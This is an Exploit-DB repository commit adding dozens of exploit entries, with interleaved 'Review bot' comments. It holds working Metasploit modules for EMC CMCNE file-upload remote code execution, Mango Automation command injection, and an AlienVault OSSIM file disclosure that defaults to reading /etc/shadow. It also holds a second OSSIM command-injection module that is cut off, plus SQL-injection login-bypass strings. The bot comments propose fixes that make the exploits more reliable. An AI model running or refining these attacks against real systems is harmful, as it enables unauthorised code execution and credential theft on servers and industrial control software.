DB: 2017-09-14

44 new exploits

Mako Web Server 2.5 - Multiple Vulnerabilities
ZScada Modbus Buffer 2.0 - Stack-Based Buffer Overflow (Metasploit)
Trend Micro Control Manager - ImportFile Directory Traversal RCE (Metasploit)
Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit)
Sielco Sistemi Winlog 2.07.16 - Buffer Overflow (Metasploit)
Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit)
Motorola Netopia Netoctopus SDCS - Stack Buffer Overflow (Metasploit)
Alienvault Open Source SIEM (OSSIM) < 4.7.0 - 'get_license' Remote Command Execution (Metasploit)
Infinite Automation Mango Automation - Command Injection (Metasploit)
Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack-Based Buffer Overflow (Metasploit)
EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution (Metasploit)
EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit)
Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow (Metasploit)
Cloudview NMS < 2.00b - Arbitrary File Upload (Metasploit)
Alienvault OSSIM av-centerd Util.pm sync_rserver - Command Execution (Metasploit)
Alienvault OSSIM av-centerd 4.7.0 - 'get_log_line' Command Injection (Metasploit)
Microsoft Windows .NET Framework - Remote Code Execution
ICLowBidAuction 3.3 - SQL Injection
ICMLM 2.1 - 'key' Parameter SQL Injection
ICHotelReservation 3.3 - 'key' Parameter SQL Injection
ICAuction 2.2 - 'id' Parameter SQL Injection
ICDoctor Appointment 1.3 - 'key' Parameter SQL Injection
ICRestaurant software 1.4 - 'key' Parameter SQL Injection
ICDutchAuction 1.2 - SQL Injection
ICAutosales 2.2 - SQL Injection
ICTraveling 2.2 - Authentication Bypass
ICStudents 1.2 - 'key' Parameter SQL Injection
ICClassifieds 1.1 - SQL Injection
ICSurvey 1.1 - SQL Injection
ICJewelry 1.1 - 'key' Parameter SQL Injection
IC-T-Shirt 1.2 - 'key' Parameter SQL Injection
ICProductConfigurator 1.1 - 'key' Parameter SQL Injection
ICGrocery 1.1 - 'key' Parameter SQL Injection
ICCallLimousine 1.1 - 'key' Parameter SQL Injection
ICProjectBidding 1.1 - SQL Injection
ICDental Clinic 1.2 - 'key' Parameter SQL Injection
ICEstate 1.1 - 'id' Parameter SQL Injection
ICHelpDesk 1.1 - 'pk' Parameter SQL Injection
ICSiteBuilder 1.1 - SQL Injection
ICAffiliateTracking 1.1 - Authentication Bypass
Indusoft Web Studio - Directory Traversal Information Disclosure (Metasploit)
Carlo Gavazzi Powersoft 2.1.1.1 - Directory Traversal File Disclosure (Metasploit)
Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure (Metasploit)
Carel PlantVisor 2.4.4 - Directory Traversal
Offensive Security 2017-09-14 05:01:22 +00:00
parent 590c03106b
commit 183eb53e48
46 changed files with 2836 additions and 24 deletions


@ -15802,6 +15802,23 @@ id,file,description,date,author,platform,type,port
42627,platforms/linux/remote/42627.py,"Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution",2017-09-06,Warflop,linux,remote,0
42630,platforms/windows/remote/42630.rb,"Gh0st Client (C2 Server) - Buffer Overflow (Metasploit)",2017-09-07,Metasploit,windows,remote,80
42650,platforms/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,python,remote,2375
42683,platforms/windows/remote/42683.txt,"Mako Web Server 2.5 - Multiple Vulnerabilities",2017-09-13,hyp3rlinx,windows,remote,0
42691,platforms/windows/remote/42691.rb,"ZScada Modbus Buffer 2.0 - Stack-Based Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
42692,platforms/php/remote/42692.rb,"Trend Micro Control Manager - ImportFile Directory Traversal RCE (Metasploit)",2017-09-13,"James Fitts",php,remote,0
42693,platforms/windows/remote/42693.rb,"Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
42694,platforms/windows/remote/42694.rb,"Sielco Sistemi Winlog 2.07.16 - Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,46824
42695,platforms/linux/remote/42695.rb,"Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit)",2014-06-13,"James Fitts",linux,remote,0
42696,platforms/windows/remote/42696.rb,"Motorola Netopia Netoctopus SDCS - Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,3814
42697,platforms/linux/remote/42697.rb,"Alienvault Open Source SIEM (OSSIM) < 4.7.0 - 'get_license' Remote Command Execution (Metasploit)",2014-08-14,"James Fitts",linux,remote,0
42698,platforms/jsp/remote/42698.rb,"Infinite Automation Mango Automation - Command Injection (Metasploit)",2017-09-13,"James Fitts",jsp,remote,0
42700,platforms/windows/remote/42700.rb,"Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack-Based Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
42701,platforms/java/remote/42701.rb,"EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",java,remote,0
42702,platforms/java/remote/42702.rb,"EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",java,remote,0
42703,platforms/windows/remote/42703.rb,"Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
42704,platforms/windows/remote/42704.rb,"Cloudview NMS < 2.00b - Arbitrary File Upload (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
42708,platforms/linux/remote/42708.rb,"Alienvault OSSIM av-centerd Util.pm sync_rserver - Command Execution (Metasploit)",2017-09-13,"James Fitts",linux,remote,40007
42709,platforms/linux/remote/42709.rb,"Alienvault OSSIM av-centerd 4.7.0 - 'get_log_line' Command Injection (Metasploit)",2017-09-13,"James Fitts",linux,remote,40007
42711,platforms/windows/remote/42711.txt,"Microsoft Windows .NET Framework - Remote Code Execution",2017-09-13,Voulnet,windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
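Review bot: the port column is inconsistent across the four av-centerd modules added here: 42708 and 42709 record 40007, but 42695 and 42697 record 0 even though both default to `Opt::RPORT(40007)` in their register_options later in this commit. The date column likewise mixes the original disclosure date (42695 as 2014-06-13, 42697 as 2014-08-14) with the submission date (2017-09-13) used for the other modules in the same batch; pick one convention per column so the index stays sortable.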
@ -38448,3 +38465,30 @@ id,file,description,date,author,platform,type,port
42661,platforms/php/webapps/42661.txt,"FoodStar 1.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps,0
42662,platforms/php/webapps/42662.txt,"Gr8 Multiple Search Engine Script 1.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps,0
42663,platforms/php/webapps/42663.txt,"inClick Cloud Server 5.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps,0
42667,platforms/php/webapps/42667.txt,"ICLowBidAuction 3.3 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42668,platforms/php/webapps/42668.txt,"ICMLM 2.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42669,platforms/php/webapps/42669.txt,"ICHotelReservation 3.3 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42670,platforms/php/webapps/42670.txt,"ICAuction 2.2 - 'id' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42671,platforms/php/webapps/42671.txt,"ICDoctor Appointment 1.3 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42672,platforms/php/webapps/42672.txt,"ICRestaurant software 1.4 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42673,platforms/php/webapps/42673.txt,"ICDutchAuction 1.2 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42674,platforms/php/webapps/42674.txt,"ICAutosales 2.2 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42675,platforms/php/webapps/42675.txt,"ICTraveling 2.2 - Authentication Bypass",2017-09-13,"Ihsan Sencan",php,webapps,0
42677,platforms/php/webapps/42677.txt,"ICStudents 1.2 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42676,platforms/php/webapps/42676.txt,"ICClassifieds 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42678,platforms/php/webapps/42678.txt,"ICSurvey 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42679,platforms/php/webapps/42679.txt,"ICJewelry 1.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42680,platforms/php/webapps/42680.txt,"IC-T-Shirt 1.2 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42681,platforms/php/webapps/42681.txt,"ICProductConfigurator 1.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42682,platforms/php/webapps/42682.txt,"ICGrocery 1.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42684,platforms/php/webapps/42684.txt,"ICCallLimousine 1.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42685,platforms/php/webapps/42685.txt,"ICProjectBidding 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42686,platforms/php/webapps/42686.txt,"ICDental Clinic 1.2 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42687,platforms/aspx/webapps/42687.txt,"ICEstate 1.1 - 'id' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",aspx,webapps,0
42688,platforms/php/webapps/42688.txt,"ICHelpDesk 1.1 - 'pk' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42689,platforms/php/webapps/42689.txt,"ICSiteBuilder 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42690,platforms/asp/webapps/42690.txt,"ICAffiliateTracking 1.1 - Authentication Bypass",2017-09-13,"Ihsan Sencan",asp,webapps,0
42699,platforms/windows/webapps/42699.rb,"Indusoft Web Studio - Directory Traversal Information Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps,0
42705,platforms/windows/webapps/42705.rb,"Carlo Gavazzi Powersoft 2.1.1.1 - Directory Traversal File Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps,0
42706,platforms/windows/webapps/42706.rb,"Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps,0
42707,platforms/windows/webapps/42707.txt,"Carel PlantVisor 2.4.4 - Directory Traversal",2011-09-13,"Luigi Auriemma",windows,webapps,0
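Review bot: 42677 is inserted ahead of 42676, breaking the ascending id order the rest of the file keeps; swap the two rows. The descriptions also diverge from the Exploit Title lines inside the advisories (42690 is listed as 'ICAffiliateTracking 1.1 - Authentication Bypass' but titled 'Affiliate Tracking Script 1.1 - Authentication Bypass'; 42687 as 'ICEstate 1.1 - 'id' Parameter SQL Injection' but titled 'Real Estate Marketplace Site ASP.NET Script 1.1 - SQL Injection'), and 42707 carries 2011-09-13 while its Metasploit counterpart 42706 carries 2017-09-13 for the same bug; align the description text with the files and settle on one date convention.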


platforms/asp/webapps/42690.txt Executable file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Affiliate Tracking Script 1.1 - Authentication Bypass
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/affiliates-tracking-script.htm
# Demo: http://www.icloudcenter.com/demos/icaffiliatetracking/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/icaffiliatetracking/adminlogin.asp
#
# User: 'or 1=1 or ''=' Pass: anything
#
# Etc..
# # # # #
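Review bot: the Description line is boilerplate ('inject sql commands....') and does not say where the injection lives; the PoC shows the username field of adminlogin.asp reaching the login query unescaped, so state that and drop the 'Etc..' filler. 'Tested on: WiN7_x64/KaLiLinuX_x64' describes the tester's client machines, not the affected server stack (classic ASP), which is what readers triaging this need. The remediation for this class of bug is a parameterised query on the login lookup rather than input filtering, and the advisory should say so.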


@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Real Estate Marketplace Site ASP.NET Script 1.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/real-estate-marketplace-site.htm
# Demo: http://www.icloudcenter.com/demos/icestatemarket/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/details.aspx?id=[SQL]
#
# Etc..
# # # # #
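Review bot: the PoC path 'http://localhost/[PATH]/details.aspx?id=[SQL]' omits the application directory, whereas the 42690 PoC in this commit includes it ('icaffiliatetracking/adminlogin.asp') and the Demo URL here points at 'demos/icestatemarket/'; either include the directory or document that [PATH] covers it. The Exploit Title ('Real Estate Marketplace Site ASP.NET Script 1.1 - SQL Injection') also does not match the files.csv description for 42687 ('ICEstate 1.1 - 'id' Parameter SQL Injection'), and the Description line is the same generic template as in 42690 with an 'Etc..' placeholder; name the unsanitised id parameter explicitly so the entry is searchable.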

platforms/java/remote/42701.rb Executable file

@ -0,0 +1,78 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC CMCNE Inmservlets.war FileUploadController Remote Code Execution',
'Description' => %q{
This module exploits a file upload vulnerability found in EMC
Connectrix Manager Converged Network Edition <= 11.2.1. The file
upload vulnerability is triggered when sending a specially crafted
filename to the FileUploadController servlet found within the
Inmservlets.war archive. This allows the attacker to upload a
specially crafted file which leads to remote code execution in the
context of the server user.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'ZDI', '13-280' ],
[ 'CVE', '2013-6810' ]
],
'Privileged' => true,
'Platform' => 'win',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 18 2013'))
register_options([
Opt::RPORT(80)
], self.class)
end
def exploit
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
deploy = "..\\..\\..\\deploy\\dcm-client.war\\"
jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
@jsp_name = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
data = Rex::MIME::Message.new
data.add_part("#{jsp}", nil, nil, "form-data; name=\"ftproot\"; filename=\"#{deploy}#{@jsp_name}\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
print_status("#{peer} - Uploading the JSP Payload...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri("inmservlets", "FileUploadController"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'headers' => {
'ROOTDIR' => "ftproot"
}
})
if res.code == 200 and res.body =~ /SUCCESSFULLY UPLOADED FILES!/
print_good("File uploaded successfully!")
print_status("Executing '#{@jsp_name}' now...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("dcm-client", "#{@jsp_name}")
})
else
print_error("Does not look like the files were uploaded to #{peer}...")
end
end
end
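Review bot: `res.code` in 'if res.code == 200 and res.body =~ /SUCCESSFULLY UPLOADED FILES!/' is called without a nil guard, and send_request_cgi returns nil on a connection failure or timeout, so an unreachable host raises NoMethodError instead of a clean print_error; use `if res && res.code == 200 && ...`. Smaller points: the `peer` local duplicates the `peer` helper the HttpClient mixin already supplies (42698.rb in this same commit relies on it), the second `res` from the GET is assigned but never checked so the module cannot tell whether the JSP actually ran, `register_options(..., self.class)` uses the deprecated two-argument form, and the description covers '<= 11.2.1' while Targets lists only '11.2.1 / Windows Server 2003 SP2'.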

platforms/java/remote/42702.rb Executable file

@ -0,0 +1,78 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC CMCNE FileUploadController Remote Code Execution',
'Description' => %q{
This module exploits a fileupload vulnerability found in EMC
Connectrix Manager Converged Network Edition <= 11.2.1. The file
upload vulnerability is triggered when sending a specially crafted
filename to the FileUploadController servlet. This allows the
attacker to upload a malicious jsp file to anywhere on the remote
file system.
},
'License' => MSF_LICENSE,
'Author' => [ 'james fitts' ],
'References' =>
[
[ 'ZDI', '13-279' ],
[ 'CVE', '2013-6810' ]
],
'Privileged' => true,
'Platform' => 'win',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 18 2013'))
register_options([
Opt::RPORT(80)
], self.class)
end
def exploit
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
deploy = "..\\..\\..\\deploy\\dcm-client.war\\"
jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
@jsp_name = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
data = Rex::MIME::Message.new
data.add_part("#{jsp}", "application/octet-stream", nil, "form-data; name=\"source\"; filename=\"#{deploy}#{@jsp_name}\"")
data.add_part("#{rand_text_alpha_upper(5)}", nil, nil, "form-data; name=\"driverFolderName\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
print_status("#{peer} - Uploading the JSP Payload...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri("HttpFileUpload", "FileUploadController.do"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res.code == 200 and res.body =~ /SUCCESSFULLY UPLOADED FILES!/
print_good("File uploaded successfully!")
print_status("Executing '#{@jsp_name}' now...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("dcm-client", "#{@jsp_name}")
})
else
print_error("Does not look like the files were uploaded to #{peer}...")
end
end
end
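Review bot: this module repeats the exploit body of 42701.rb almost line for line; only the upload URI ('HttpFileUpload/FileUploadController.do' instead of 'inmservlets/FileUploadController'), the form part names and the absence of the ROOTDIR header differ, so one module with a target or option selecting the servlet would be easier to maintain than two files under one CVE. It inherits the same defect: `res.code` is dereferenced without checking for nil after send_request_cgi, and the result of the GET that triggers the JSP is never inspected. Note also that the traversal prefix '..\\..\\..\\deploy\\dcm-client.war\\' is assumed to resolve from the same base directory in both servlets even though 42701 explicitly selects 'ftproot' via ROOTDIR and this one does not; if that assumption only holds for one install layout it should be documented in the description.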

platforms/jsp/remote/42698.rb Executable file

@ -0,0 +1,114 @@
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Infinite Automation Mango Automation Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability found in Infinite
Automation Systems Mango Automation v2.5.0 - 2.6.0 beta (builds prior to
430).
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2015-7901' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-15-300-02' ]
],
'DisclosureDate' => 'Oct 28 2015'))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ false, 'Base path to Mango Automation', '/login.htm']),
OptString.new('CMD', [ false, 'The OS command to execute', 'calc.exe']),
OptString.new('USER', [true, 'The username to login with', 'admin']),
OptString.new('PASS', [true, 'The password to login with', 'admin']),
], self.class )
end
def do_login(user, pass)
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})
if res.nil?
vprint_error("#{peer} - Connection timed out")
return :abort
end
cookie = res.headers['Set-Cookie']
print_status("Attempting to login with credentials '#{user}:#{pass}'")
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'vars_post' => {
'username' => user,
'password' => pass,
}
})
if res.nil?
vprint_error("#{peer} - Connection timed out")
return :abort
end
location = res.headers['Location']
if res and res.headers and (location = res.headers['Location']) and location =~ /data_point_details.shtm/
print_good("#{peer} - Successful login: '#{user}:#{pass}'")
else
vprint_error("#{peer} - Bad login: '#{user}:#{pass}'")
return
end
return cookie
end
def run
cookie = do_login(datastore['USER'], datastore['PASS'])
data = "callCount=1&"
data << "page=%2Fevent_handlers.shtm&"
data << "httpSessionId=%0D%0A&"
data << "scriptSessionId=26D579040C1C11D2E21D1E5F321094E5866&"
data << "c0-scriptName=EventHandlersDwr&"
data << "c0-methodName=testProcessCommand&"
data << "c0-id=0&"
data << "c0-param0=string:c:\\windows\\system32\\cmd.exe /c #{datastore['CMD']}&"
data << "c0-param1=string:15&"
data << "batchId=24"
res = send_request_raw({
'method' => 'POST',
'uri' => normalize_uri("dwr", "call", "plaincall", "EventHandlersDwr.testProcessCommand.dwr"),
'cookie' => cookie.split(";")[0],
'ctype' => "application/x-www-form-urlencoded",
'headers' => {
'Origin' => 'null',
'Upgrade-Insecure-Requests' => 1,
'Connection' => "keep-alive"
},
'data' => data,
}, 5)
if res.body =~ /org.directwebremoting.extend.MarshallException/
print_error("Something went wrong...")
puts res.body
elsif res.body =~ /Check your Tomcat console for process output/
print_good("Command executed successfully")
end
end
end
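Review bot: `run` never checks what do_login returned before calling `cookie.split(";")`; do_login returns :abort on a timeout and nil on a bad login, and neither responds to split, so every failed login ends in NoMethodError rather than a message. Return early unless the result is a String. Related: at 'location = res.headers['Location']' the variable is assigned and then immediately reassigned inside the following `if`, `res.body` after send_request_raw is also dereferenced without a nil check (the call has a 5 second timeout, so nil is a normal outcome), `puts res.body` should go through vprint_status so it respects the module's output settings, 'Upgrade-Insecure-Requests' => 1 passes an Integer where a header value should be a String, and an Msf::Auxiliary module does not use Rank.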

platforms/linux/remote/42695.rb Executable file

@ -0,0 +1,119 @@
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Alienvault OSSIM av-centerd Util.pm get_file Information Disclosure',
'Description' => %q{
This module exploits an information disclosure vulnerability found within the get_file
function in Util.pm. The vulnerability exists because of an unsanitized $r_file parameter
that allows for the leaking of arbitrary file information.
},
'References' =>
[
[ 'CVE', '2014-4153' ],
[ 'ZDI', '14-207' ],
[ 'URL', 'http://forums.alienvault.com/discussion/2806' ],
],
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Jun 13 2014')
register_options([
Opt::RPORT(40007),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('FILE', [ false, 'This is the file to download', '/etc/shadow'])
], self.class)
end
def run
soap = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n"
soap += "<soap:Envelope xmlns:soap=\"http:\/\/schemas.xmlsoap.org/soap/envelope/\"\r\n"
soap += "xmlns:soapenc=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding/\" xmlns:xsd=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\r\n"
soap += "xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\r\n"
soap += "soap:encodingStyle=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\">\r\n"
soap += "<soap:Body>\r\n"
soap += "<get_file xmlns=\"AV\/CC\/Util\">\r\n"
soap += "<c-gensym3 xsi:type=\"xsd:string\">All</c-gensym3>\r\n"
soap += "<c-gensym5 xsi:type=\"xsd:string\">423d7bea-cfbc-f7ea-fe52-272ff7ede3d2</c-gensym5>\r\n"
soap += "<c-gensym7 xsi:type=\"xsd:string\">#{datastore['RHOST']}</c-gensym7>\r\n"
soap += "<c-gensym9 xsi:type=\"xsd:string\">#{Rex::Text.rand_text_alpha(4 + rand(4))}</c-gensym9>\r\n"
soap += "<c-gensym11 xsi:type=\"xsd:string\">#{datastore['FILE']}</c-gensym11>\r\n"
soap += "</get_file>\r\n"
soap += "</soap:Body>\r\n"
soap += "</soap:Envelope>\r\n"
res = send_request_cgi(
{
'uri' => '/av-centerd',
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => soap,
'headers' => {
'SOAPAction' => "\"AV/CC/Util#get_file\""
}
}, 20)
if res && res.code == 200
print_good("Dumping contents of #{datastore['FILE']} now...")
data = res.body.scan(/(?<=xsi:type="soapenc:Array"><item xsi:type="xsd:string">)[\S\s]+<\/item><item xsi:type="xsd:string">/)
puts data[0].split("<")[0]
else
print_bad("Something went wrong...")
end
end
end
__END__
/usr/share/alienvault-center/lib/AV/CC/Util.pm
sub get_file {
my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $r_file )
= @_;
my $file_content;
verbose_log_file(
"GET FILE : Received call from $uuid : ip source = $admin_ip, hostname = $hostname :($funcion_llamada,$nombre,$r_file)"
);
if ($r_file =~ /[;`\$\<\>\|]/) {
console_log_file("Not allowed r_file: $r_file in get_file\n");
my @ret = ("Error");
return \@ret;
}
if ( !-f "$r_file" ) {
#my @ret = ("Error");
verbose_log_file("Error file $r_file not found!");
# Return empty file if not exists
my @ret = ( "", "d41d8cd98f00b204e9800998ecf8427e", "$systemuuid" );
return \@ret;
}
my $md5sum = `md5sum $r_file | awk {'print \$1'}` if ( -f "$r_file" );
if ( open( my $ifh, $r_file ) ) {
binmode($ifh);
$file_content = do { local $/; <$ifh> };
close($ifh);
my @ret = ( "$file_content", "$md5sum", "$systemuuid" );
return \@ret;
}
else {
my @ret = ("Error");
verbose_log_file("Error file $r_file not found!");
return \@ret;
}
}
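Review bot: `data[0].split("<")[0]` assumes the regex scan matched; when the server takes the 'Error' branch shown in the Util.pm excerpt (r_file containing a blacklisted character) the response has a single item and scan returns an empty array, so data[0] is nil and the module raises NoMethodError after already printing 'Dumping contents ...'. Check `data.empty?` before printing, and print the success line only after the body has been parsed. The not-found branch returns an empty first item plus the md5 d41d8cd98f00b204e9800998ecf8427e, which the greedy `[\S\s]+` matches across into the next item, so the module prints a blank line instead of reporting that the file does not exist; treat that md5 as the not-found signal. The retrieved content is only sent to `puts`; store_loot would keep it with the other evidence. On the excerpt itself: the character blacklist is a shell-metacharacter filter and does nothing to confine $r_file to a directory, so the fix belongs in path validation (an allowlist of permitted files, or a realpath check against a base directory) rather than a longer blacklist.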

platforms/linux/remote/42697.rb Executable file

@ -0,0 +1,237 @@
require 'msf/core'
require 'rexml/document'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include REXML
def initialize(info = {})
super(update_info(info,
'Name' => 'Alienvault OSSIM av-centerd Command Injection get_license',
'Description' => %q{
This module exploits a command injection flaw found in the get_license
function found within Util.pm. The vulnerability is triggered due to an
unsanitized $license_type parameter passed to a string which is then
executed by the system.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-5210' ],
[ 'ZDI', '14-294' ],
[ 'BID', '69239' ],
[ 'URL', 'https://www.alienvault.com/forums/discussion/2690' ]
],
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' =>
{
'SSL' => true,
},
'Payload' =>
{
'Compat' => {
'RequiredCmd' => 'perl netcat-e openssl python gawk'
}
},
'DefaultTarget' => 0,
'Targets' =>
[
['Alienvault <= 4.7.0',{}]
],
'DisclosureDate' => 'Aug 14 2014'))
register_options([Opt::RPORT(40007)], self.class)
end
def check
version = ""
res = send_soap_request("get_dpkg")
if res &&
res.code == 200 &&
res.headers['SOAPServer'] &&
res.headers['SOAPServer'] =~ /SOAP::Lite/ &&
res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/
version = $1
end
if version.empty? || version >= "4.7.0"
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Appears
end
end
def build_soap_request(method, pass)
xml = Document.new
xml.add_element(
"soap:Envelope",
{
"xmlns:xsi" => "http://www.w3.org/2001/XMLSchema-instance",
"xmlns:soapenc" => "http://schemas.xmlsoap.org/soap/encoding/",
"xmlns:xsd" => "http://www.w3.org/2001/XMLSchema",
"soap:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/",
"xmlns:soap" => "http://schemas.xmlsoap.org/soap/envelope/"
})
body = xml.root.add_element("soap:Body")
m = body.add_element(method, { 'xmlns' => "AV/CC/Util" })
args = []
args[0] = m.add_element("c-gensym3", {'xsi:type' => 'xsd:string'})
args[0].text = "All"
args[1] = m.add_element("c-gensym5", {'xsi:type' => 'xsd:string'})
